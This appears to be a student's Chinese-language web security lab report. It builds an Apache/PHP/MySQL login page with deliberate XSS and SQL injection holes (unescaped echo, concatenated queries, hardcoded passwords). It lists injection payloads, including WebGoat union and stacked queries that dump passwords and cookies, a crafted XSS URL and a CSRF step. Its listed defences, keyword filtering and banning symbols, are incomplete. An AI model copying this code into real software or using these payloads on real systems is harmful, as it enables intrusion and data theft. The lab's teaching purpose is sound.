Exp8 Web综合

@

Exp8 Web综合

一、实验内容

 (1).Web前端HTML           (1分)
   能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。
(2).Web前端javascipt        (1分)
  理解JavaScript的基本功能,理解DOM。
  在(1)的基础上,编写JavaScript验证用户名、密码的规则。在用户点击登陆按钮后回显“欢迎+输入的用户名”
  尝试注入攻击:利用回显用户名注入HTML及JavaScript。
(3).Web后端:MySQL基础:正常安装、启动MySQL,建库、创建用户、修改密码、建表               (1分)
(4).Web后端:编写PHP网页,连接数据库,进行用户认证           (1分)
(5).最简单的SQL注入,XSS攻击测试              (1分)
(6).选做Webgoat或类似平台的SQL注入、XSS、CSRF攻击各一例。    (1分)

二、实验过程

(一)Web前端HTML:能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。

使用service apache2 start命令打开Apache服务

在浏览器输入127.0.0.1 ,如果可以打开Apache网页,则开启成功

输入cd /var/www/html,新建一个HTML文件login.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<style type="text/css">
    .divForm{
        position: absolute;/*绝对定位*/
        width: 300px;
        height: 200px;

        text-align: center;/*(让div中的内容居中)*/
        top: 50%;
        left: 50%;
        margin-top: -200px;
        margin-left: -150px;
    }
</style>
<body>
<div class="divForm">
    <h1 align="center">登陆界面</h1>
    <form name="form1" method="post" action="index.php">
        <table border = "0">
            <tr>
                <td>用户名:</td>
                <td><input type="text" name="username" value="" /></td>
            </tr>
            <tr>
                <td>密&nbsp&nbsp&nbsp&nbsp码:</td>
                <td><input type="password" name="userpwd" value="" /></td>
            </tr>
            <tr>
                <td></td>
                <td><input type="submit" value="提交" /> <input type="reset" value="重填" /></td>
            </tr>
        </table>
    </form>
</div>

</body>
</html>

使用浏览器打开制作的网页,在浏览器输入localhost/login.html

尝试注入攻击:利用回显用户名注入HTML及JavaScript

(二)Web前端javascipt

理解JavaScript的基本功能,理解DOM。编写JavaScript验证用户名、密码的规则。
在login.html加上一段JavaScriptdiam,来判断用户是否填写了用户名和密码。

<script type="text/javascript">
    function checkForm(){	//定义javascript函数名
        if (form1.username.value == null || form1.username.value==""){	//判断表单用户名值是否合法
            alert("请输入用户名");	//弹窗警告
            return false;	//返回值false,阻止表单提交
        }
        if (form1.userpwd.value == null || form1.userpwd.value==""){	//判断表单用户名值是否合法
            alert("请输入密码");	//弹窗警告
            return false;	//返回值false,阻止表单提交
        }
        return true;
    }
</script>

使用浏览器打开制作的网页,在浏览器输入localhost/login.html,如果不填写用户名直接登陆,会提示“请输入用户名”。

如果没有输入密码

编写JavaScript验证用户名、密码的规则。在用户点击登陆按钮后回显“欢迎+输入的用户名”,
写一个用于接收用户登陆数据的index.php文件:

index.php:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Welcome!</title>
</head>
<body>
<h1 align="center">欢迎!<?php echo $_POST['username'];?></h1>
</body>
</html>

网页效果如下:

尝试注入攻击:利用回显用户名注入HTML及JavaScript
方法:登陆时将用户名改为<script>alert("20191213")</script>,使页面弹窗。

(三)Web后端:MySQL基础:正常安装、启动MySQL,建库、创建用户、修改密码、建表

1.正常安装、启动MySQL
输入 service mysql start 开启MySQL服务

输入 mysql -u root -p使用root权限进入,默认的密码是 password

show databases; 查看数据库基本信息

2.修改密码
输入use mysql;

输入 select user, password, host from user; 查看当前用户信息

输入set password for root@’localhost’= password(‘20191213’);密码修改成功

再次输入 select user, password, host from user; 查看当前用户信息,可以看到密码序列发生变化,密码修改成功

输入 flush privileges; 更新权限

输入 quit 退出数据库,使用新的密码登录

3.建库、创建用户、修改密码、建表
输入 mysql -u root -p用新密码登录

使用 create database lyd; 建立数据库

使用 show databases; 查看存在的数据库

使用use lyd;使用我们创建的数据库

create table 表名 (字段设定列表);建立数据库表,并设置字段基本信息:
create table login (username VARCHAR(20),password VARCHAR(20));
insert into login values('20191213lyd@163.com','666');
使用 select * from 表名; 查询表中的数据

在MySQL中增加新用户,使用指令
grant select,insert,update,delete on lyd.* to lanyida@localhost identified by "20191213";
这句话的意思是将对某数据库的所有表的select,insert,update,delete权限授予某IP登录的某用户

增加新用户后,quit退出,然后使用新的用户名和密码进行登录

输入mysql -u lanyida -p

登录成功,说明成功增加新用户

(四)Web后端:编写PHP网页,连接数据库,进行用户认证

建立一个新的数据库student,并添加user表,新增表项username=20191213lanyida和 passwd=1213

编写PHP网页easy_sql.php,连接数据库

<?php
$con=mysqli_connect("127.0.0.1","root","20191213","student");
if (!$con)
{
    die("Connection failed: " . mysqli_connect_error());
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<style type="text/css">
    .divForm{
        position: absolute;/*绝对定位*/
        width: 300px;
        height: 200px;

        text-align: center;/*(让div中的内容居中)*/
        top: 50%;
        left: 50%;
        margin-top: -200px;
        margin-left: -150px;
    }
</style>
<body>
<div class="divForm">
    <h1 align="center">登陆界面</h1>
    <form name="form1" method="post" action="easy_sql.php">
        <table border = "0">
            <tr>
                <td>用户名:</td>
                <td><input type="text" name="username" value="" /></td>
            </tr>
            <tr>
                <td>密&nbsp&nbsp&nbsp&nbsp码:</td>
                <td><input type="password" name="userpwd" value="" /></td>
            </tr>
            <tr>
                <td></td>
                <td><input type="submit" value="提交" /> <input type="reset" value="重填" /></td>
            </tr>
        </table>
    </form>
    <?php
    $username=$_POST["username"];
    $userpwd=$_POST["userpwd"];
    if($username&&$userpwd) {
        $result = mysqli_query($con, "select * from user where username='$username' and password='$userpwd'");
        $row = mysqli_fetch_array($result);
        if ($row) {
            echo "welcome!".$row['username'];
        } else {
            echo $username."是hacker!!!";
        }
    }
    ?>
</div>
</body>
</html>

对于login.html中的action修改为"easy_sql.php",然后我们进行验证。
输入正确的用户名和密码进行登陆。

进行用户认证,输入不存在的用户名和密码。

(五)最简单的SQL注入,XSS攻击测试

1.SQL注入
在登录界面用户名处输入' or 1=1#,密码随便输,如下:


2.XSS攻击
在用户名输入<script>alert(1)</script>,密码随便输

(六)选做Webgoat或类似平台的SQL注入、XSS、CSRF攻击各一例

1.webgoat安装
推荐使用docker安装

curl  -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - //添加Docker官方的GPG密钥
echo 'deb https://download.docker.com/linux/debian stretch stable'> /etc/apt/sources.list.d/docker.list //更新源
apt-get install apt-transport-https  ca-certificates  curl  gnupg2  software-properties-common // 直接导入证书
apt-get update //系统更新
sudo apt install docker.io //安装docker 
docker -v //检查docker安装是否成功
docker search webgoat
docker pull webgoat/webgoat-8.0
docker images
systemctl restart docker
docker run -dt --name webgoat -p 8080:8080 --rm webgoat/webgoat-8.0
然后访问 http://localhost:8080/WebGoat 即可

2.SQL注入攻击
SQL Injection (advanced) 第3页
先拿到 user_data 表中的数据
jack' or '1'='1

再通过堆叠注入,拿到 user_system_data 表中的数据。
z';select * from user_system_data;--

union selcect方式:
z' union select userid,user_name,user_name,user_name,password,cookie,userid from user_system_data--+

3.xss攻击
Cross Site Scripting 第7页
做测试,<script>alert(20191213);</script>成功执行了 JS 代码,说明这里确实存在 xss 漏洞。

构造恶意链接

http://192.168.64.130:8080/WebGoat/CrossSiteScripting/attack5a?QTY1=1&QTY2=1&QTY3=1&QTY4=1&field1=%3Cscript%3Ealert(20191213)%3B%3C%2Fscript%3E&field2=111


发现题目要的是:
<script>alert('xss')</script>

也可以将带有攻击性的url作为输入源,让服务器跳到相应的错误页
4.CSRF攻击
Basic Get CSRF Exercise 第三页
题目的意思是在登录Webgoat的情况下通过一个外部的源触发请求,在响应中便能拿到flag。
先点击Submit Query,得到响应:

这里提示我们当前这个请求是从同一个源发出的,查看headers

这里有三个属性:

Host表示请求的目的地,包括域名和端口号
Origin表示请求是从哪发起的,包括协议、域名、端口号
Referer表示当前页面的来源完整地址,包括协议、域名、查询参数
这里我们用burpsuite抓包后尝试修改Referer:为一个外部网站:

三、基础问题回答

(1)什么是表单?
表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分:

表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法
表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等
表单按钮:包括提交按钮、复位按钮和一般按钮;用于将数据传送到服务器上的CGI脚本或者取消输入,还可以用表单按钮来控制其他定义了处理脚本的处理工作
(2)浏览器可以解析运行什么语言?
呈现给用户的浏览器界面属于前端范畴,浏览器可以解析HTML(超文本标记语言)、XML(可扩展标记语言)以及Python、PHP、JavaScript、ASP等语言。

(3)WebServer支持哪些动态语言
服务器端就是后端范畴,支持PHP、JSP、.NET、数据库语言等。

(4)防范注入攻击的方法有哪些
一是可以在后台控制输入的长度或者禁止用户输入一些特殊符号,例如-- 、'#等;

二是对漏洞注入点相关代码进行关键字的过滤(如:利用正则表达式),以规范代码安全性;

三是可以不让浏览器记住密码,或者将密码加密保存,使得攻击没有可获取的东西;

四是进行验证码等随机数验证。

四、实验心得

本次实验综合性很强,从建立表单编写JavaScript验证用户名、密码的规则,连接数据库到web的攻击手段,有点类似于CTF比赛web题目的感觉,这一块正好是自己的弱点,对一些工具的使用还不熟悉,我也发现想做好一个网站真挺难的,要把各种安全问题考虑进去,还要定期维护,学到了不少知识。

posted @ 2022-05-26 18:28  20191213兰毅达  阅读(77)  评论(0编辑  收藏  举报